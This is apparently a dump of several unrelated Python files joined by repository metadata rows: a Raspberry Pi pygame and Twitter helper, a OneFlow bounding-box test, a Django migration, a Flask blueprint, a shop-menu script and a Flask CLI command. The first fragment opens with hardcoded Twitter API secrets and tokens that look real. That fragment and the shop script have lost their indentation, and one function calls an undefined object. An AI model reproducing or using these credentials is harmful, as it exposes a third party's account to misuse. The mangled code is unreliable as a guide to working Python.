APP_SECRET='ksfSVa2hxvTQKYy4UR9tjpb57CAynMJDsygz9qOyzlH24NVwpW'
OAUTH_TOKEN='794094183841566720-BagrHW91yH8C3Mdh9SOlBfpL6wrSVRW'
OAUTH_TOKEN_SECRET='d0Uucq2dkSHrFHZGLM1X8Hw05d80ajKYGl1zTRxZQSKTm'
applepislcy = Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
### GENERAL ###
def Cleanup():
GPIO.cleanup()
def Sleep(seconds):
"""Puts the program to sleep"""
time.sleep(seconds)
def Alert(channel):
"""Simple alert function for testing event interrupts"""
print('Alert on channel',channel)
def TimeString():
"""Returns the current time"""
t = time.localtime()
return str(t[0])+'.'+str(t[1])+'.'+str(t[2])+'.'+str(t[3])+'.'+str(t[4])+'.'+str(t[5])
def LoadPins(mapping,inp):
"""Organizes an input into a pin mapping dict
mapping <list>, ['IA','IB']
inp <dict>, <list>, <int> {'IA':1,'IB':2}, [1,2]
"""
if type(inp) is int and len(mapping) == 1:
return {mapping[0]:inp}
elif type(inp) is list and len(mapping) == len(inp):
o = {}
for i in range(len(inp)):
o[mapping[i]] = inp[i]
return o
elif type(inp) is dict:
return inp
else:
print('Invalid input for pins:',inp,type(inp))
print('Expected:',mapping)
return {}
def BoolToSign(inp):
"""Converts boolean bits into signed bits
0 -> -1
1 -> 1"""
return (inp * 2) - 1
def SignToBool(inp):
"""Converts signed bits into boolean bits
-1 -> 0
1 -> 1"""
return (inp + 1) / 2
### PYGAME ###
def WindowSetup(size=(300,50),caption='',text='',background=(0,0,0),foreground=(255,255,255)):
"""Sets up a pygame window to take keyboard input
size <tuple>, width by height
caption <str>, window title bar
text <str>, text to display in window, accepts \n
background <tuple>, foreground <tuple>, (r,g,b) color
"""
pygame.init()
screen = pygame.display.set_mode(size,0,32)
pygame.display.set_caption(caption)
myfont = pygame.font.SysFont('Monospace',15)
labels = []
lines = text.split('\n')
for line in lines:
labels.append(myfont.render(line,1,foreground))
screen.fill(background)
y = 0
for label in labels:
screen.blit(label, (0,y))
y += 15
pygame.display.update()
def InputLoop(eventmap):
"""Begins a pygame loop, mapping key inputs to functions
eventmap <dict>, {pygame.K_t:myfunction}
"""
index = 0
while True:
events = pygame.event.get()
for event in events:
if event.type == pygame.KEYDOWN:
#print("{0}: You pressed {1:c}".format ( index , event.key ))
if event.key in eventmap:
eventmap[event.key]()
elif event.type == pygame.QUIT:
pygame.quit()
sys.exit()
def InputLoopDemo():
def dog():
print('woof')
def cat():
print('meow')
def fish():
print('blub')
WindowSetup(caption='pet simulator',text='d for dog\nc for cat\nf for fish')
InputLoop({pygame.K_d:dog, pygame.K_c:cat, pygame.K_f:fish})
### TWITTER ###
def Tweet(twit,statustext):
"""Tweets a message
twit <Twython>, create with Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
statustext <str>, must be <= 140 characters
"""
if len(statustext) > 140:
print('ERROR: Character limit 140 exceeded:',len(statustext))
else:
twit.update_status(status=statustext)
def TweetPicture(twit,file,statustext):
"""Tweets a message with a picture
twit <Twython>, create with Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
file <str>, path and filename to picture
statustext <str>, must be <= 140 characters
"""
photo = open(file, 'rb')
    response = twit.upload_media(media=photo)
twit.update_status(status=statustext, media_ids=[response['media_id']])
def TweetVideo(twit,file,statustext):
"""Tweets a message with a video
twit <Twython>, create with Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
file <str>, path and filename to video
statustext <str>, must be <= 140 characters
"""
video = open(file, 'rb')
response = twitter.upload_video(media=video, media_type='video/mp4')
twit.update_status(status=statustext, media_ids=[response['media_id']])
| 30.883562 | 94 | 0.635174 |
71ad91d94d2021895fed2197ad1e1027179c068d | 5,844 | py | Python | oneflow/python/test/ops/test_object_bbox_scale.py | caishenghang/oneflow | db239cc9f98e551823bf6ce2d4395bd5c339b1c5 | [
"Apache-2.0"
] | 2 | 2021-09-10T00:19:49.000Z | 2021-11-16T11:27:20.000Z | oneflow/python/test/ops/test_object_bbox_scale.py | duijiudanggecl/oneflow | d2096ae14cf847509394a3b717021e2bd1d72f62 | [
"Apache-2.0"
] | null | null | null | oneflow/python/test/ops/test_object_bbox_scale.py | duijiudanggecl/oneflow | d2096ae14cf847509394a3b717021e2bd1d72f62 | [
"Apache-2.0"
] | 1 | 2021-11-10T07:57:01.000Z | 2021-11-10T07:57:01.000Z | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import os
import random
import cv2
import numpy as np
import oneflow as flow
import oneflow.typing as oft
def _random_sample_images(anno_file, image_dir, batch_size):
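    # Randomly sample COCO images until `batch_size` images are collected, keeping
    # only images in the same aspect-ratio group (int(h / w)) as the first pick and
    # having at least one annotation; returns the decoded images and their bbox lists.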
from pycocotools.coco import COCO
image_files = []
image_ids = []
batch_group_id = -1
coco = COCO(anno_file)
img_ids = coco.getImgIds()
while len(image_files) < batch_size:
rand_img_id = random.choice(img_ids)
img_h = coco.imgs[rand_img_id]["height"]
img_w = coco.imgs[rand_img_id]["width"]
group_id = int(img_h / img_w)
if batch_group_id == -1:
batch_group_id = group_id
if group_id != batch_group_id:
continue
anno_ids = coco.getAnnIds(imgIds=[rand_img_id])
if len(anno_ids) == 0:
continue
image_files.append(os.path.join(image_dir, coco.imgs[rand_img_id]["file_name"]))
image_ids.append(rand_img_id)
assert len(image_files) == len(image_ids)
images = [cv2.imread(image_file).astype(np.single) for image_file in image_files]
bbox_list = _get_images_bbox_list(coco, image_ids)
return images, bbox_list
def _get_images_bbox_list(coco, image_ids):
bbox_list = []
for img_id in image_ids:
anno_ids = coco.getAnnIds(imgIds=[img_id])
anno_ids = list(
filter(lambda anno_id: coco.anns[anno_id]["iscrowd"] == 0, anno_ids)
)
bbox_array = np.array(
[coco.anns[anno_id]["bbox"] for anno_id in anno_ids], dtype=np.single
)
bbox_list.append(bbox_array)
return bbox_list
def _get_images_static_shape(images):
image_shapes = [image.shape for image in images]
image_static_shape = np.amax(image_shapes, axis=0)
assert isinstance(
image_static_shape, np.ndarray
), "image_shapes: {}, image_static_shape: {}".format(
str(image_shapes), str(image_static_shape)
)
image_static_shape = image_static_shape.tolist()
image_static_shape.insert(0, len(image_shapes))
return image_static_shape
def _get_bbox_static_shape(bbox_list):
bbox_shapes = [bbox.shape for bbox in bbox_list]
bbox_static_shape = np.amax(bbox_shapes, axis=0)
assert isinstance(
bbox_static_shape, np.ndarray
), "bbox_shapes: {}, bbox_static_shape: {}".format(
str(bbox_shapes), str(bbox_static_shape)
)
bbox_static_shape = bbox_static_shape.tolist()
bbox_static_shape.insert(0, len(bbox_list))
return bbox_static_shape
def _of_target_resize_bbox_scale(images, bbox_list, target_size, max_size):
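    # Builds a OneFlow job that target-resizes the images and rescales the bounding
    # boxes by the same per-image scale factors, then runs it on the given batch.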
image_shape = _get_images_static_shape(images)
bbox_shape = _get_bbox_static_shape(bbox_list)
flow.clear_default_session()
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float)
func_config.default_logical_view(flow.scope.mirrored_view())
@flow.global_function(function_config=func_config)
def target_resize_bbox_scale_job(
image_def: oft.ListListNumpy.Placeholder(
shape=tuple(image_shape), dtype=flow.float
),
bbox_def: oft.ListListNumpy.Placeholder(
shape=tuple(bbox_shape), dtype=flow.float
),
):
images_buffer = flow.tensor_list_to_tensor_buffer(image_def)
resized_images_buffer, new_size, scale = flow.image_target_resize(
images_buffer, target_size=target_size, max_size=max_size
)
bbox_buffer = flow.tensor_list_to_tensor_buffer(bbox_def)
scaled_bbox = flow.object_bbox_scale(bbox_buffer, scale)
scaled_bbox_list = flow.tensor_buffer_to_tensor_list(
scaled_bbox, shape=bbox_shape[1:], dtype=flow.float
)
return scaled_bbox_list, new_size
input_image_list = [np.expand_dims(image, axis=0) for image in images]
input_bbox_list = [np.expand_dims(bbox, axis=0) for bbox in bbox_list]
output_bbox_list, output_image_size = target_resize_bbox_scale_job(
[input_image_list], [input_bbox_list]
).get()
return output_bbox_list.numpy_lists()[0], output_image_size.numpy_list()[0]
def _compare_bbox_scale(
test_case,
anno_file,
image_dir,
batch_size,
target_size,
max_size,
print_debug_info=False,
):
images, bbox_list = _random_sample_images(anno_file, image_dir, batch_size)
of_bbox_list, image_size_list = _of_target_resize_bbox_scale(
images, bbox_list, target_size, max_size
)
for image, bbox, of_bbox, image_size in zip(
images, bbox_list, of_bbox_list, image_size_list
):
w, h = image_size
oh, ow = image.shape[0:2]
scale_h = h / oh
scale_w = w / ow
bbox[:, 0] *= scale_w
bbox[:, 1] *= scale_h
bbox[:, 2] *= scale_w
bbox[:, 3] *= scale_h
test_case.assertTrue(np.allclose(bbox, of_bbox))
@flow.unittest.skip_unless_1n1d()
class TestObjectBboxScale(flow.unittest.TestCase):
def test_object_bbox_scale(test_case):
_compare_bbox_scale(
test_case,
"/dataset/mscoco_2017/annotations/instances_val2017.json",
"/dataset/mscoco_2017/val2017",
4,
800,
1333,
)
if __name__ == "__main__":
unittest.main()
| 32.287293 | 88 | 0.688912 |
1ce550dcd34ad1e54a6bb3af57029219d257f4d1 | 742 | py | Python | source/blog/migrations/0004_postcomments.py | JakubGutowski/PersonalBlog | 96122b36486f7e874c013e50d939732a43db309f | [
"BSD-3-Clause"
] | null | null | null | source/blog/migrations/0004_postcomments.py | JakubGutowski/PersonalBlog | 96122b36486f7e874c013e50d939732a43db309f | [
"BSD-3-Clause"
] | null | null | null | source/blog/migrations/0004_postcomments.py | JakubGutowski/PersonalBlog | 96122b36486f7e874c013e50d939732a43db309f | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.0.5 on 2018-07-02 19:46
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('blog', '0003_blogpost_author'),
]
operations = [
migrations.CreateModel(
name='PostComments',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nick', models.CharField(max_length=20)),
('comment', models.CharField(max_length=140)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.BlogPost')),
],
),
]
| 30.916667 | 115 | 0.58221 |
1cecb4c2f3b6f24c919644faa0e058b12f679c06 | 273 | py | Python | src/flocker/blueprints/red/__init__.py | Muxelmann/home-projects | 85bd06873174b9c5c6276160988c19b460370db8 | [
"MIT"
] | null | null | null | src/flocker/blueprints/red/__init__.py | Muxelmann/home-projects | 85bd06873174b9c5c6276160988c19b460370db8 | [
"MIT"
] | null | null | null | src/flocker/blueprints/red/__init__.py | Muxelmann/home-projects | 85bd06873174b9c5c6276160988c19b460370db8 | [
"MIT"
] | null | null | null | import os
from flask import Blueprint, render_template
def create_bp():
bp_red = Blueprint('red', __name__, url_prefix='/red')
@bp_red.route('/index/')
@bp_red.route('/')
def index():
return render_template('red/index.html')
return bp_red | 22.75 | 58 | 0.652015 |
1c073d575249e6f524c3e4fa1ac84edb0ff05cc7 | 984 | py | Python | UAS/UAS 11 & 12/main.py | Archedar/UAS | 3237d9304026340acc93c8f36b358578dc0ae66f | [
"BSD-Source-Code"
] | null | null | null | UAS/UAS 11 & 12/main.py | Archedar/UAS | 3237d9304026340acc93c8f36b358578dc0ae66f | [
"BSD-Source-Code"
] | null | null | null | UAS/UAS 11 & 12/main.py | Archedar/UAS | 3237d9304026340acc93c8f36b358578dc0ae66f | [
"BSD-Source-Code"
] | null | null | null | #Main Program
from Class import Barang
import Menu
histori = list()
listBarang = [
Barang('Rinso', 5000, 20),
Barang('Sabun', 3000, 20),
Barang('Pulpen', 2500, 20),
Barang('Tisu', 10000, 20),
Barang('Penggaris', 1000, 20)
]
while True:
print('''
Menu
1. Tampilkan Barang
2. Tambahkan Barang
3. Tambah Stock Barang
4. Hapus Barang
5. Cari Barang Berdasarkan Keyword
6. Hitung Barang Belanjaan
7. Histori Keluar Masuk Barang
0. Keluar Program
''')
choice = input('Masukan No Menu: ')
if choice == '1':
Menu.menu1(listBarang)
elif choice == '2':
Menu.menu2(listBarang, histori)
elif choice == '3':
Menu.menu3(listBarang, histori)
elif choice == '4':
Menu.menu4(listBarang, histori)
elif choice == '5':
Menu.menu5(listBarang)
elif choice == '6':
Menu.menu6(listBarang, histori)
elif choice == '7':
Menu.menu7(histori)
elif choice == '0':
print('Keluar Program')
break
else:
print('Invalid Input!') | 20.93617 | 37 | 0.645325 |
98d7520f9994f6836e73faaf42f63009eee0dc64 | 697 | py | Python | project/cli/event.py | DanielGrams/gsevp | e94034f7b64de76f38754b56455e83092378261f | [
"MIT"
] | 1 | 2021-06-01T14:49:18.000Z | 2021-06-01T14:49:18.000Z | project/cli/event.py | DanielGrams/gsevp | e94034f7b64de76f38754b56455e83092378261f | [
"MIT"
] | 286 | 2020-12-04T14:13:00.000Z | 2022-03-09T19:05:16.000Z | project/cli/event.py | DanielGrams/gsevpt | a92f71694388e227e65ed1b24446246ee688d00e | [
"MIT"
] | null | null | null | import click
from flask.cli import AppGroup
from project import app, db
from project.dateutils import berlin_tz
from project.services.event import (
get_recurring_events,
update_event_dates_with_recurrence_rule,
)
event_cli = AppGroup("event")
@event_cli.command("update-recurring-dates")
def update_recurring_dates():
# Setting the timezone is neccessary for cli command
db.session.execute("SET timezone TO :val;", {"val": berlin_tz.zone})
events = get_recurring_events()
for event in events:
update_event_dates_with_recurrence_rule(event)
db.session.commit()
click.echo(f"{len(events)} event(s) were updated.")
app.cli.add_command(event_cli)
| 24.034483 | 72 | 0.746055 |